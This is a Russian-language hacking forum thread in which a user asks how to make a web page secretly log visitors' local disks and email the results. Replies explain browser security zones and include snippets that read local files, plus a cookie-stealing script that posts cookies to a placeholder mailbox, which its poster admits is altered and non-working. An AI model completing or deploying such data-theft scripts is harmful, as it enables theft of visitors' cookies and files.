Народ, у меня идея есть...Все знают скрипт, когда на твой сайт заходит чел, то он видит свой C: (если он не через анонимомайзер) ...Его можно дописать, что бы его диск, вносился  в лог-файл и высылался на определенный мейл...
Я долго ломал башку, но так и не доперло...
Подскажите

Так просто не получится.
Есть такое понятие как зона безопасности.
Твой диск находится в зоне "Мой компьютер", а страница открывается из зоны "Интернет", а доступ из документов одной зоны, к документам другой зоны запрещен.
Так например такой код:

<iframe id="localdisk" src="c:\temp.html"></iframe>
< script>
alert(localdisk.document.innerHTML)
</script>

работать не будет, если он размещен на инетовской страничке(зона "Интернет"). Будет выдаваться ошибка "Доступ запрещен".
А если это фрагмент файла, открываемого со своей машины (зона "Мой компьютер"), то работать будет ))

Речь идет даже не о хаке, а о простом просмотре диска c...

А что, "просто просмотр диска С" это не хак ?? http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif

скрипт < script>javascript:navigate('file:///c:/'http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif</script> ,помещённый где то,срабатывает на машине юзера и каждый видит свой диск С:,а просмотреть чужой конечно можно,но не скриптом на веб странице,скрипт может выяснять только наличие определённых файлов,причём находящихся, как говорится по умалчиванию и не больше,а вот кто знает,как эта мулька работает?  http://www.danasoft.com/vipersig.jpg  
да,это снифер,но через чур уж прикольный, ещё и умничает в нижней строке http://forum.antichat.ru/iB_html/non-cgi/emoticons/biggrin.gif (в опере правда ошибается,хотя может в настройках оперы стоит инициировать её как MSIE...)

есть такая феня:
< script language=javascript>
var cook=show_all_cookies();
document.open("cookies",cook);
document.write('<form onsubmit="javascript:window.close();"
method=post action="mailto:ваше мыло@mail.ru"
ENCTYPE="text/plain"><input type=hidden
name=h1 value=',cook,'><input type=submit value="Доброго времени суток!">
</form>'http://forum.antichat.ru/iB_html/non-cgi/emoticons/wink.gif;
document.close("cookies");
</SCRIPT>
(скрипт в целях безопасности был немного изменён)
НО она Изменена!!! http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif
Я не могу найти оригинал...хотя даже в книге написано именно так...вроде тут все верно, хотя реально он не пашет...(((

И что это ?
Насколько я понял это должно отсылать куки на мыло?
Кстати в скрипте вызывается функция show_all_cookies(), но ее описания нет.
И кстати чтение куков других сайтов не допускается системой безопасности браузера (по кр мере в IE; в опере система немного попроще..)